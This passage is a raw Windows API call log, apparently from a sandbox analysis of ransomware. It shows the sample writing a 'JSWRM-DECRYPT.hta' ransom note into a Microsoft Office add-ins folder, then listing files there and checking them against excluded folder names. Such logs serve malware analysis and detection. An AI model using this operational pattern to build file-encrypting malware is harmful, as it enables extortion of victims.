hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.291] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\no\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.293] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.293] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.294] CloseHandle (hObject=0x338) returned 1 [0123.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0123.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0123.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0123.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\no\\jswrm-decrypt.hta")) returned 0x20 [0123.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0123.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0123.294] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\no\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4025959e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x232180 [0123.294] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.294] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4025959e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.294] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.294] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.294] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4025959e, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4025959e, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4025959e, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.295] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0123.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0123.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0123.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0123.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0123.295] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45f9db0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4620012, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.295] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.295] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.295] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.295] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.295] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.295] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.295] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.295] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.295] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.295] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0123.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0123.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0123.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0123.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244f90 [0123.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.296] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4409f1c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4409f1c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4409f1c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.296] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.296] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.296] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.296] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.296] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.296] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.296] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.296] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.296] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.296] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0123.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0123.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0123.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0123.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x2450c8 [0123.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244f90 | out: hHeap=0x1e0000) returned 1 [0123.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.297] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8680a1e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x8680a1e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x8680a1e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.297] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.297] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.297] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.297] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.297] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.297] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.297] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.297] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.297] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.297] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0123.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0123.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245470 [0123.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2450c8 | out: hHeap=0x1e0000) returned 1 [0123.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.297] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc5ae112, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc5ae112, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc5d437d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.297] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.297] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.298] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.298] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.298] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.298] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.298] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.298] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.298] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.298] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0123.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0123.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0123.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0123.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0123.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245470 | out: hHeap=0x1e0000) returned 1 [0123.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.298] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc5ae112, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc5ae112, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc5d437d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x87040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.298] FindClose (in: hFindFile=0x232180 | out: hFindFile=0x232180) returned 1 [0123.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0123.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0123.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.298] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa879350, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa879350, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa8eba59, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6daa8, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="Office.dll", cAlternateFileName="")) returned 1 [0123.298] lstrcmpiW (lpString1="Office.dll", lpString2=".") returned 1 [0123.298] lstrcmpiW (lpString1="Office.dll", lpString2="..") returned 1 [0123.298] lstrcmpiW (lpString1="Office.dll", lpString2="...") returned 1 [0123.298] lstrcmpiW (lpString1="Office.dll", lpString2="windows") returned -1 [0123.298] lstrcmpiW (lpString1="Office.dll", lpString2="recovery") returned -1 [0123.299] lstrcmpiW (lpString1="Office.dll", lpString2="perflogs") returned -1 [0123.299] lstrcmpiW (lpString1="Office.dll", lpString2="documents and settings") returned 1 [0123.299] lstrcmpiW (lpString1="Office.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.299] lstrcmpiW (lpString1="Office.dll", lpString2="system volume information") returned -1 [0123.299] lstrcmpiW (lpString1="Office.dll", lpString2="msocache") returned 1 [0123.299] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0123.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0123.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.dll", cchWideChar=10, 